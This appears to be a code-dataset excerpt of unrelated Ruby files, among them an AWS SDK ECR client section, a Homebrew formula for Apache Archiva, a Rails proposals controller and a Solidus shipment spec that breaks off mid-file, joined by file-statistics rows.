# @option params [required, Types::ReplicationConfiguration] :replication_configuration
# An object representing the replication configuration for a registry.
#
# @return [Types::PutReplicationConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutReplicationConfigurationResponse#replication_configuration #replication_configuration} => Types::ReplicationConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.put_replication_configuration({
# replication_configuration: { # required
# rules: [ # required
# {
# destinations: [ # required
# {
# region: "Region", # required
# registry_id: "RegistryId", # required
# },
# ],
# },
# ],
# },
# })
#
# @example Response structure
#
# resp.replication_configuration.rules #=> Array
# resp.replication_configuration.rules[0].destinations #=> Array
# resp.replication_configuration.rules[0].destinations[0].region #=> String
# resp.replication_configuration.rules[0].destinations[0].registry_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutReplicationConfiguration AWS API Documentation
#
# @overload put_replication_configuration(params = {})
# @param [Hash] params ({})
def put_replication_configuration(params = {}, options = {})
req = build_request(:put_replication_configuration, params)
req.send_request(options)
end
# Applies a repository policy to the specified repository to control
# access permissions. For more information, see [Amazon ECR Repository
# Policies][1] in the *Amazon Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to receive the policy.
#
# @option params [required, String] :policy_text
# The JSON repository policy text to apply to the repository. For more
# information, see [Amazon ECR Repository Policies][1] in the *Amazon
# Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policy-examples.html
#
# @option params [Boolean] :force
# If the policy you are attempting to set on a repository policy would
# prevent you from setting another policy in the future, you must force
# the SetRepositoryPolicy operation. This is intended to prevent
# accidental repository lock outs.
#
# @return [Types::SetRepositoryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::SetRepositoryPolicyResponse#registry_id #registry_id} => String
# * {Types::SetRepositoryPolicyResponse#repository_name #repository_name} => String
# * {Types::SetRepositoryPolicyResponse#policy_text #policy_text} => String
#
# @example Request syntax with placeholder values
#
# resp = client.set_repository_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# policy_text: "RepositoryPolicyText", # required
# force: false,
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/SetRepositoryPolicy AWS API Documentation
#
# @overload set_repository_policy(params = {})
# @param [Hash] params ({})
def set_repository_policy(params = {}, options = {})
req = build_request(:set_repository_policy, params)
req.send_request(options)
end
# Starts an image vulnerability scan. An image scan can only be started
# once per day on an individual image. This limit includes if an image
# was scanned on initial push. For more information, see [Image
# Scanning][1] in the *Amazon Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to start an image scan request. If you do not
# specify a registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that contains the images to scan.
#
# @option params [required, Types::ImageIdentifier] :image_id
# An object with identifying information for an Amazon ECR image.
#
# @return [Types::StartImageScanResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartImageScanResponse#registry_id #registry_id} => String
# * {Types::StartImageScanResponse#repository_name #repository_name} => String
# * {Types::StartImageScanResponse#image_id #image_id} => Types::ImageIdentifier
# * {Types::StartImageScanResponse#image_scan_status #image_scan_status} => Types::ImageScanStatus
#
# @example Request syntax with placeholder values
#
# resp = client.start_image_scan({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_id: { # required
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_id.image_digest #=> String
# resp.image_id.image_tag #=> String
# resp.image_scan_status.status #=> String, one of "IN_PROGRESS", "COMPLETE", "FAILED"
# resp.image_scan_status.description #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/StartImageScan AWS API Documentation
#
# @overload start_image_scan(params = {})
# @param [Hash] params ({})
def start_image_scan(params = {}, options = {})
req = build_request(:start_image_scan, params)
req.send_request(options)
end
# Starts a preview of a lifecycle policy for the specified repository.
# This allows you to see the results before associating the lifecycle
# policy with the repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to be evaluated.
#
# @option params [String] :lifecycle_policy_text
# The policy to be evaluated against. If you do not specify a policy,
# the current policy for the repository is used.
#
# @return [Types::StartLifecyclePolicyPreviewResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartLifecyclePolicyPreviewResponse#registry_id #registry_id} => String
# * {Types::StartLifecyclePolicyPreviewResponse#repository_name #repository_name} => String
# * {Types::StartLifecyclePolicyPreviewResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::StartLifecyclePolicyPreviewResponse#status #status} => String
#
# @example Request syntax with placeholder values
#
# resp = client.start_lifecycle_policy_preview({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# lifecycle_policy_text: "LifecyclePolicyText",
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.status #=> String, one of "IN_PROGRESS", "COMPLETE", "EXPIRED", "FAILED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/StartLifecyclePolicyPreview AWS API Documentation
#
# @overload start_lifecycle_policy_preview(params = {})
# @param [Hash] params ({})
def start_lifecycle_policy_preview(params = {}, options = {})
req = build_request(:start_lifecycle_policy_preview, params)
req.send_request(options)
end
# Adds specified tags to a resource with the specified ARN. Existing
# tags on a resource are not changed if they are not specified in the
# request parameters.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the the resource to which to add
# tags. Currently, the only supported resource is an Amazon ECR
# repository.
#
# @option params [required, Array<Types::Tag>] :tags
# The tags to add to the resource. A tag is an array of key-value pairs.
# Tag keys can have a maximum character length of 128 characters, and
# tag values can have a maximum length of 256 characters.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "Arn", # required
# tags: [ # required
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Deletes specified tags from a resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource from which to remove
# tags. Currently, the only supported resource is an Amazon ECR
# repository.
#
# @option params [required, Array<String>] :tag_keys
# The keys of the tags to be removed.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "Arn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Uploads an image layer part to Amazon ECR.
#
# When an image is pushed, each new image layer is uploaded in parts.
# The maximum size of each image layer part can be 20971520 bytes (or
# about 20MB). The UploadLayerPart API is called once per each new image
# layer part.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry to which you are
# uploading layer parts. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to which you are uploading layer parts.
#
# @option params [required, String] :upload_id
# The upload ID from a previous InitiateLayerUpload operation to
# associate with the layer part upload.
#
# @option params [required, Integer] :part_first_byte
# The position of the first byte of the layer part witin the overall
# image layer.
#
# @option params [required, Integer] :part_last_byte
# The position of the last byte of the layer part within the overall
# image layer.
#
# @option params [required, String, StringIO, File] :layer_part_blob
# The base64-encoded layer part payload.
#
# @return [Types::UploadLayerPartResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UploadLayerPartResponse#registry_id #registry_id} => String
# * {Types::UploadLayerPartResponse#repository_name #repository_name} => String
# * {Types::UploadLayerPartResponse#upload_id #upload_id} => String
# * {Types::UploadLayerPartResponse#last_byte_received #last_byte_received} => Integer
#
# @example Request syntax with placeholder values
#
# resp = client.upload_layer_part({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# upload_id: "UploadId", # required
# part_first_byte: 1, # required
# part_last_byte: 1, # required
# layer_part_blob: "data", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.upload_id #=> String
# resp.last_byte_received #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/UploadLayerPart AWS API Documentation
#
# @overload upload_layer_part(params = {})
# @param [Hash] params ({})
def upload_layer_part(params = {}, options = {})
req = build_request(:upload_layer_part, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-ecr'
context[:gem_version] = '1.40.0'
Seahorse::Client::Request.new(handlers, context)
end
# Polls an API operation until a resource enters a desired state.
#
# ## Basic Usage
#
# A waiter will call an API operation until:
#
# * It is successful
# * It enters a terminal state
# * It makes the maximum number of attempts
#
# In between attempts, the waiter will sleep.
#
# # polls in a loop, sleeping between attempts
# client.wait_until(waiter_name, params)
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. You can pass
# configuration as the final arguments hash.
#
# # poll for ~25 seconds
# client.wait_until(waiter_name, params, {
# max_attempts: 5,
# delay: 5,
# })
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# client.wait_until(waiter_name, params, {
#
# # disable max attempts
# max_attempts: nil,
#
# # poll for 1 hour, instead of a number of attempts
# before_wait: -> (attempts, response) do
# throw :failure if Time.now - started_at > 3600
# end
# })
#
# ## Handling Errors
#
# When a waiter is unsuccessful, it will raise an error.
# All of the failure errors extend from
# {Aws::Waiters::Errors::WaiterFailed}.
#
# begin
# client.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# ## Valid Waiters
#
# The following table lists the valid waiter names, the operations they call,
# and the default `:delay` and `:max_attempts` values.
#
# | waiter_name | params | :delay | :max_attempts |
# | --------------------------------- | ------------------------------------- | -------- | ------------- |
# | image_scan_complete | {Client#describe_image_scan_findings} | 5 | 60 |
# | lifecycle_policy_preview_complete | {Client#get_lifecycle_policy_preview} | 5 | 20 |
#
# @raise [Errors::FailureStateError] Raised when the waiter terminates
# because the waiter has entered a state that it will not transition
# out of, preventing success.
#
# @raise [Errors::TooManyAttemptsError] Raised when the configured
# maximum number of attempts have been made, and the waiter is not
# yet successful.
#
# @raise [Errors::UnexpectedError] Raised when an error is encounted
# while polling for a resource that is not expected.
#
# @raise [Errors::NoSuchWaiterError] Raised when you request to wait
# for an unknown state.
#
# @return [Boolean] Returns `true` if the waiter was successful.
# @param [Symbol] waiter_name
# @param [Hash] params ({})
# @param [Hash] options ({})
# @option options [Integer] :max_attempts
# @option options [Integer] :delay
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
def wait_until(waiter_name, params = {}, options = {})
w = waiter(waiter_name, options)
yield(w.waiter) if block_given? # deprecated
w.wait(params)
end
# @api private
# @deprecated
def waiter_names
waiters.keys
end
private
# @param [Symbol] waiter_name
# @param [Hash] options ({})
def waiter(waiter_name, options = {})
waiter_class = waiters[waiter_name]
if waiter_class
waiter_class.new(options.merge(client: self))
else
raise Aws::Waiters::Errors::NoSuchWaiterError.new(waiter_name, waiters.keys)
end
end
def waiters
{
image_scan_complete: Waiters::ImageScanComplete,
lifecycle_policy_preview_complete: Waiters::LifecyclePolicyPreviewComplete
}
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 43.216344 | 362 | 0.662675 |
0161f8e6d21afd3fa769541735a201a58cc65f2d | 118 | class Object
def self.const_missing(c)
require Rulerss.to_underscore(c.to_s)
Object.const_get(c)
end
end
| 16.857143 | 41 | 0.728814 |
e29c2cd42fe761aa63f5cdd156b1d48105829d9a | 1,005 | class ApacheArchiva < Formula
desc "Build Artifact Repository Manager"
homepage "https://archiva.apache.org/"
url "https://www.apache.org/dyn/closer.lua?path=archiva/2.2.5/binaries/apache-archiva-2.2.5-bin.tar.gz"
mirror "https://archive.apache.org/dist/archiva/2.2.5/binaries/apache-archiva-2.2.5-bin.tar.gz"
sha256 "01119af2d9950eacbcce0b7f8db5067b166ad26c1e1701bef829105441bb6e29"
license "Apache-2.0"
depends_on "openjdk"
def install
libexec.install Dir["*"]
(bin/"archiva").write_env_script libexec/"bin/archiva", JAVA_HOME: Formula["openjdk"].opt_prefix
end
def post_install
(var/"archiva/logs").mkpath
(var/"archiva/data").mkpath
(var/"archiva/temp").mkpath
cp_r libexec/"conf", var/"archiva"
end
service do
run [opt_bin/"archiva", "console"]
environment_variables ARCHIVA_BASE: var/"archiva"
log_path var/"archiva/logs/launchd.log"
end
test do
assert_match "was not running.", shell_output("#{bin}/archiva stop")
end
end
| 29.558824 | 105 | 0.720398 |
eda676262fc023c4a18939ada4157dd9e55170d0 | 495 | require 'test_helper'
class SubscriptionsHelperTest < ActionView::TestCase
include SubscriptionsHelper
test 'expiration_month_options' do
assert_not_nil expiration_month_options
end
test 'expiration_year_options' do
assert_not_nil expiration_year_options
end
test "format_monthly_amount" do
free_amount = format_monthly_amount(0)
assert_equal "Free!", free_amount
ten_a_month = format_monthly_amount(1000)
assert_equal "$10/month", ten_a_month
end
end
| 22.5 | 52 | 0.785859 |
ed66190bddbe7a0dd1f298c61b25ea48d2096fe4 | 1,282 | class ProposalsController < ApplicationController
expose(:talk) { build_talk }
expose(:speaker) { talk.speakers.first }
expose(:format) { params[:format] || params[:proposal][:format] }
expose(:proposal) { Proposal.new :format => format, :talk => talk }
expose(:tracks) { Track.current_year }
expose(:video_approvals) { Talk.video_approvals }
expose(:durations) { Talk.talk_durations }
def new
if RefinerySetting.find_or_set("#{format}_proposals_accepted".to_sym, 'true') == true
render "new_#{format}"
else
render "cfp_expired"
end
end
def create
if talk.save
Proposal.create :status => 'submitted', :talk => talk, :format => format
email_method = format == 'workshop' ? 'workshop_submission_email' : 'talk_submission_email'
SpeakerMailer.send(email_method, talk).deliver
render "create_#{format}"
else
render "new_#{format}"
end
end
private
def build_talk
return Talk.new(:speakers => [Speaker.new]) if params[:proposal].nil?
image_param = params[:proposal][:talk_attributes][:speakers_attributes]["0"].delete(:image)
image = Image.new(image_param) if image_param
Talk.new(params[:proposal][:talk_attributes]).tap{|t| t.speakers.first.image = image if image}
end
end
| 34.648649 | 98 | 0.687988 |
4a0752d70d411b3e7f8a58b443f18abfb78e407c | 884 | User.find(:all).each do |user|
user.plugins.create(:name => "campaigns",
:position => (user.plugins.maximum(:position) || -1) +1)
end
RefinerySetting.create :name => Refinery::Mailchimp::API::KeySetting[:name], :value => Refinery::Mailchimp::API::KeySetting[:default], :restricted => true
RefinerySetting.create :name => Refinery::Mailchimp::API::DefaultFromNameSetting[:name], :value => Refinery::Mailchimp::API::DefaultFromNameSetting[:default], :restricted => true
RefinerySetting.create :name => Refinery::Mailchimp::API::DefaultFromEmailSetting[:name], :value => Refinery::Mailchimp::API::DefaultFromEmailSetting[:default], :restricted => true
RefinerySetting.create :name => Refinery::Mailchimp::API::DefaultToNameSetting[:name], :value => Refinery::Mailchimp::API::DefaultToNameSetting[:default], :restricted => true
| 80.363636 | 180 | 0.701357 |
b9e7d380b292909331d4c04db6a9bd41df4510e5 | 29,455 | # frozen_string_literal: true
require 'rails_helper'
require 'benchmark'
RSpec.describe Spree::Shipment, type: :model do
let(:order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:shipping_method) { create(:shipping_method, name: "UPS") }
let(:stock_location) { create(:stock_location) }
let(:shipment) do
order.shipments.create!(
state: 'pending',
cost: 1,
inventory_units: order.inventory_units,
shipping_rates: [shipping_rate],
stock_location: stock_location
)
end
let(:shipping_rate) do
Spree::ShippingRate.create!(
shipping_method: shipping_method,
selected: true
)
end
let(:variant) { mock_model(Spree::Variant) }
let(:line_item) { mock_model(Spree::LineItem, variant: variant) }
context '#transfer_to_location' do
it 'transfers unit to a new shipment with given location' do
order = create(:completed_order_with_totals, line_items_count: 2)
shipment = order.shipments.first
variant = order.inventory_units.map(&:variant).first
aggregate_failures("verifying new shipment attributes") do
expect do
Spree::Deprecation.silence do
shipment.transfer_to_location(variant, 1, stock_location)
end
end.to change { Spree::Shipment.count }.by(1)
new_shipment = order.shipments.last
expect(new_shipment.number).to_not eq(shipment.number)
expect(new_shipment.stock_location).to eq(stock_location)
expect(new_shipment.line_items.count).to eq(1)
expect(new_shipment.line_items.first.variant).to eq(variant)
end
end
end
# Regression test for https://github.com/spree/spree/issues/4063
context "number generation" do
before { allow(order).to receive :update! }
it "generates a number containing a letter + 11 numbers" do
shipment.save
expect(shipment.number[0]).to eq("H")
expect(/\d{11}/.match(shipment.number)).not_to be_nil
expect(shipment.number.length).to eq(12)
end
end
it 'is backordered if one if its inventory_units is backordered' do
shipment.inventory_units = [
build(:inventory_unit, state: 'backordered', shipment: nil),
build(:inventory_unit, state: 'shipped', shipment: nil)
]
expect(shipment).to be_backordered
end
context '#determine_state' do
it 'returns canceled if order is canceled?' do
allow(order).to receive_messages canceled?: true
expect(shipment.determine_state(order)).to eq 'canceled'
end
it 'returns pending unless order.can_ship?' do
allow(order).to receive_messages can_ship?: false
expect(shipment.determine_state(order)).to eq 'pending'
end
it 'returns pending if backordered' do
allow(shipment).to receive_messages inventory_units: [mock_model(Spree::InventoryUnit, allow_ship?: false, canceled?: false)]
expect(shipment.determine_state(order)).to eq 'pending'
end
it 'returns shipped when already shipped' do
allow(shipment).to receive_messages state: 'shipped'
expect(shipment.determine_state(order)).to eq 'shipped'
end
it 'returns pending when unpaid' do
allow(order).to receive_messages paid?: false
expect(shipment.determine_state(order)).to eq 'pending'
end
it 'returns ready when paid' do
allow(order).to receive_messages paid?: true
expect(shipment.determine_state(order)).to eq 'ready'
end
end
context "display_amount" do
it "retuns a Spree::Money" do
shipment.cost = 21.22
expect(shipment.display_amount).to eq(Spree::Money.new(21.22))
end
end
context "display_total" do
it "retuns a Spree::Money" do
allow(shipment).to receive(:total) { 21.22 }
expect(shipment.display_total).to eq(Spree::Money.new(21.22))
end
end
context "display_item_cost" do
it "retuns a Spree::Money" do
allow(shipment).to receive(:item_cost) { 21.22 }
expect(shipment.display_item_cost).to eq(Spree::Money.new(21.22))
end
end
context "#item_cost" do
let(:shipment) { order.shipments[0] }
let(:order) do
create(
:order_ready_to_ship,
line_items_attributes: [{ price: 10, variant: variant }],
ship_address: ship_address,
)
end
let!(:ship_address) { create(:address) }
let!(:tax_zone) { create(:global_zone) } # will include the above address
let!(:tax_rate) { create(:tax_rate, amount: 0.1, zone: tax_zone, tax_categories: [tax_category]) }
let(:tax_category) { create(:tax_category) }
let(:variant) { create(:variant, tax_category: tax_category) }
it 'should equal line items final amount with tax' do
expect(shipment.item_cost).to eql(11.0)
end
end
it "#discounted_cost" do
shipment = create(:shipment)
shipment.cost = 10
shipment.promo_total = -1
expect(Spree::Deprecation.silence { shipment.discounted_cost }).to eq(9)
end
describe '#total_before_tax' do
before do
shipment.update_attributes!(cost: 10)
end
let!(:admin_adjustment) { create(:adjustment, adjustable: shipment, order: shipment.order, amount: -1, source: nil) }
let!(:promo_adjustment) { create(:adjustment, adjustable: shipment, order: shipment.order, amount: -2, source: promo_action) }
let!(:ineligible_promo_adjustment) { create(:adjustment, eligible: false, adjustable: shipment, order: shipment.order, amount: -4, source: promo_action) }
let(:promo_action) { promo.actions[0] }
let(:promo) { create(:promotion, :with_line_item_adjustment) }
it 'returns the amount minus any adjustments' do
expect(shipment.total_before_tax).to eq(10 - 1 - 2)
end
end
it "#tax_total with included taxes" do
shipment = Spree::Shipment.new
expect(shipment.tax_total).to eq(0)
shipment.included_tax_total = 10
expect(shipment.tax_total).to eq(10)
end
it "#tax_total with additional taxes" do
shipment = Spree::Shipment.new
expect(shipment.tax_total).to eq(0)
shipment.additional_tax_total = 10
expect(shipment.tax_total).to eq(10)
end
it "#total" do
shipment = Spree::Shipment.new
shipment.cost = 10
shipment.adjustment_total = -2
shipment.included_tax_total = 1
expect(shipment.total).to eq(8)
end
context "manifest" do
let(:order) { create(:order) }
let(:variant) { create(:variant) }
let!(:line_item) { order.contents.add variant }
let!(:shipment) { order.create_proposed_shipments.first }
it "returns variant expected" do
expect(shipment.manifest.first.variant).to eq variant
end
context "variant was removed" do
before { variant.discard }
it "still returns variant expected" do
expect(shipment.manifest.first.variant).to eq variant
end
end
end
context 'shipping_rates' do
let(:shipment) { create(:shipment) }
let(:shipping_method1) { create(:shipping_method) }
let(:shipping_method2) { create(:shipping_method) }
let(:shipping_rates) {
[
Spree::ShippingRate.new(shipping_method: shipping_method1, cost: 10.00, selected: true),
Spree::ShippingRate.new(shipping_method: shipping_method2, cost: 20.00)
]
}
it 'returns shipping_method from selected shipping_rate' do
shipment.shipping_rates.delete_all
shipment.shipping_rates.create shipping_method: shipping_method1, cost: 10.00, selected: true
expect(shipment.shipping_method).to eq shipping_method1
end
context 'refresh_rates' do
let(:mock_estimator) { double('estimator', shipping_rates: shipping_rates) }
before { allow(shipment).to receive(:can_get_rates?){ true } }
it 'should request new rates, and maintain shipping_method selection' do
expect(Spree::Stock::Estimator).to receive(:new).with(no_args).and_return(mock_estimator)
allow(shipment).to receive_messages(shipping_method: shipping_method2)
expect(shipment.refresh_rates).to eq(shipping_rates)
expect(shipment.reload.selected_shipping_rate.shipping_method_id).to eq(shipping_method2.id)
end
it 'should handle no shipping_method selection' do
expect(Spree::Stock::Estimator).to receive(:new).with(no_args).and_return(mock_estimator)
allow(shipment).to receive_messages(shipping_method: nil)
expect(shipment.refresh_rates).to eq(shipping_rates)
expect(shipment.reload.selected_shipping_rate).not_to be_nil
end
it 'should not refresh if shipment is shipped' do
expect(Spree::Stock::Estimator).not_to receive(:new)
shipment.shipping_rates.delete_all
allow(shipment).to receive_messages(shipped?: true)
expect(shipment.refresh_rates).to eq([])
end
it "can't get rates without a shipping address" do
shipment.order.update_attributes!(ship_address: nil)
expect(shipment.refresh_rates).to eq([])
end
it 'uses the pluggable estimator class' do
expect(Spree::Config.stock).to receive(:estimator_class).and_call_original
shipment.refresh_rates
end
context 'to_package' do
let(:inventory_units) do
[build(:inventory_unit, line_item: line_item, variant: variant, state: 'on_hand'),
build(:inventory_unit, line_item: line_item, variant: variant, state: 'backordered')]
end
before do
allow(line_item).to receive(:order) { order }
allow(shipment).to receive(:inventory_units) { inventory_units }
allow(inventory_units).to receive_message_chain(:includes, :joins).and_return inventory_units
end
it 'should use symbols for states when adding contents to package' do
package = shipment.to_package
expect(package.on_hand.count).to eq 1
expect(package.backordered.count).to eq 1
end
it 'should set the shipment to itself' do
expect(shipment.to_package.shipment).to eq(shipment)
end
end
end
end
context "#update_state" do
shared_examples_for "immutable once shipped" do
before { shipment.update_columns(state: 'shipped') }
it "should remain in shipped state once shipped" do
expect {
shipment.update_state
}.not_to change { shipment.state }
end
end
shared_examples_for "pending if backordered" do
it "should have a state of pending if backordered" do
# Set as ready so we can test for change
shipment.update_attributes!(state: 'ready')
allow(shipment).to receive_messages(inventory_units: [mock_model(Spree::InventoryUnit, allow_ship?: false, canceled?: false)])
expect(shipment).to receive(:update_columns).with(state: 'pending', updated_at: kind_of(Time))
shipment.update_state
end
end
context "when order cannot ship" do
before { allow(order).to receive_messages can_ship?: false }
it "should result in a 'pending' state" do
# Set as ready so we can test for change
shipment.update_attributes!(state: 'ready')
expect(shipment).to receive(:update_columns).with(state: 'pending', updated_at: kind_of(Time))
shipment.update_state
end
end
context "when order is paid" do
before { allow(order).to receive_messages paid?: true }
it "should result in a 'ready' state" do
expect(shipment).to receive(:update_columns).with(state: 'ready', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when payment is not required" do
before do
Spree::Config[:require_payment_to_ship] = false
end
it "should result in a 'ready' state" do
expect(shipment).to receive(:update_columns).with(state: 'ready', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when order has balance due" do
before { allow(order).to receive_messages paid?: false }
it "should result in a 'pending' state" do
shipment.state = 'ready'
expect(shipment).to receive(:update_columns).with(state: 'pending', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when order has a credit owed" do
before { allow(order).to receive_messages payment_state: 'credit_owed', paid?: true }
it "should result in a 'ready' state" do
shipment.state = 'pending'
expect(shipment).to receive(:update_columns).with(state: 'ready', updated_at: kind_of(Time))
shipment.update_state
end
it_should_behave_like 'immutable once shipped'
it_should_behave_like 'pending if backordered'
end
context "when shipment state changes to shipped" do
it "should call after_ship" do
shipment.state = 'pending'
expect(shipment).to receive :after_ship
allow(shipment).to receive_messages determine_state: 'shipped'
expect(shipment).to receive(:update_columns).with(state: 'shipped', updated_at: kind_of(Time))
shipment.update_state
end
# Regression test for https://github.com/spree/spree/issues/4347
context "with adjustments" do
before do
shipment.adjustments << Spree::Adjustment.create(order: order, label: "Label", amount: 5)
end
it "transitions to shipped" do
shipment.update_column(:state, "ready")
shipment.ship!
end
end
end
end
context "when order is completed" do
before do
allow(order).to receive_messages completed?: true
allow(order).to receive_messages canceled?: false
end
context "with inventory tracking" do
before { Spree::Config.set track_inventory_levels: true }
it "should validate with inventory" do
shipment.inventory_units = [create(:inventory_unit)]
expect(shipment.valid?).to be true
end
end
context "without inventory tracking" do
before { Spree::Config.set track_inventory_levels: false }
it "should validate with no inventory" do
expect(shipment.valid?).to be true
end
end
end
context "#cancel" do
it 'cancels the shipment' do
allow(shipment.order).to receive(:update!)
shipment.state = 'pending'
expect(shipment).to receive(:after_cancel)
shipment.cancel!
expect(shipment.state).to eq 'canceled'
end
it 'restocks the items' do
variant = shipment.inventory_units.first.variant
shipment.stock_location = mock_model(Spree::StockLocation)
expect(shipment.stock_location).to receive(:restock).with(variant, 1, shipment)
shipment.after_cancel
end
context "with backordered inventory units" do
let(:order) { create(:order) }
let(:variant) { create(:variant) }
let(:other_order) { create(:order) }
before do
order.contents.add variant
order.create_proposed_shipments
other_order.contents.add variant
other_order.create_proposed_shipments
end
it "doesn't fill backorders when restocking inventory units" do
shipment = order.shipments.first
expect(shipment.inventory_units.count).to eq 1
expect(shipment.inventory_units.first).to be_backordered
other_shipment = other_order.shipments.first
expect(other_shipment.inventory_units.count).to eq 1
expect(other_shipment.inventory_units.first).to be_backordered
expect {
shipment.cancel!
}.not_to change { other_shipment.inventory_units.first.state }
end
end
end
context "#resume" do
let(:inventory_unit) { create(:inventory_unit) }
before { shipment.state = 'canceled' }
context "when order cannot ship" do
before { allow(order).to receive_messages(can_ship?: false) }
it "should result in a 'pending' state" do
shipment.resume!
expect(shipment.state).to eq 'pending'
end
end
context "when order is not paid" do
before { allow(order).to receive_messages(paid?: false) }
it "should result in a 'ready' state" do
shipment.resume!
expect(shipment.state).to eq 'pending'
end
end
context "when any inventory is backordered" do
before { allow_any_instance_of(Spree::InventoryUnit).to receive(:allow_ship?).and_return(false) }
it "should result in a 'ready' state" do
shipment.resume!
expect(shipment.state).to eq 'pending'
end
end
context "when the order is paid, shippable, and not backordered" do
before do
allow(order).to receive_messages(can_ship?: true)
allow(order).to receive_messages(paid?: true)
allow_any_instance_of(Spree::InventoryUnit).to receive(:allow_ship?).and_return(true)
end
it "should result in a 'ready' state" do
shipment.resume!
expect(shipment.state).to eq 'ready'
end
end
it 'unstocks them items' do
variant = shipment.inventory_units.first.variant
shipment.stock_location = mock_model(Spree::StockLocation)
expect(shipment.stock_location).to receive(:unstock).with(variant, 1, shipment)
shipment.after_resume
end
end
context "#ship" do
context "when the shipment is canceled" do
let(:address){ create(:address) }
let(:order){ create(:order_with_line_items, ship_address: address) }
let(:shipment_with_inventory_units) { create(:shipment, order: order, state: 'canceled') }
let(:subject) { shipment_with_inventory_units.ship! }
before do
allow(order).to receive(:update!)
allow(shipment_with_inventory_units).to receive_messages(require_inventory: false, update_order: true)
end
it 'unstocks them items' do
expect(shipment_with_inventory_units.stock_location).to receive(:unstock).with(an_instance_of(Spree::Variant), 1, shipment_with_inventory_units)
subject
end
end
['ready', 'canceled'].each do |state|
context "from #{state}" do
before do
allow(order).to receive(:update!)
allow(shipment).to receive_messages(require_inventory: false, update_order: true, state: state)
end
it "finalizes adjustments" do
shipment.adjustments.each do |adjustment|
expect(adjustment).to receive(:finalize!)
end
shipment.ship!
end
end
end
end
context "#ready" do
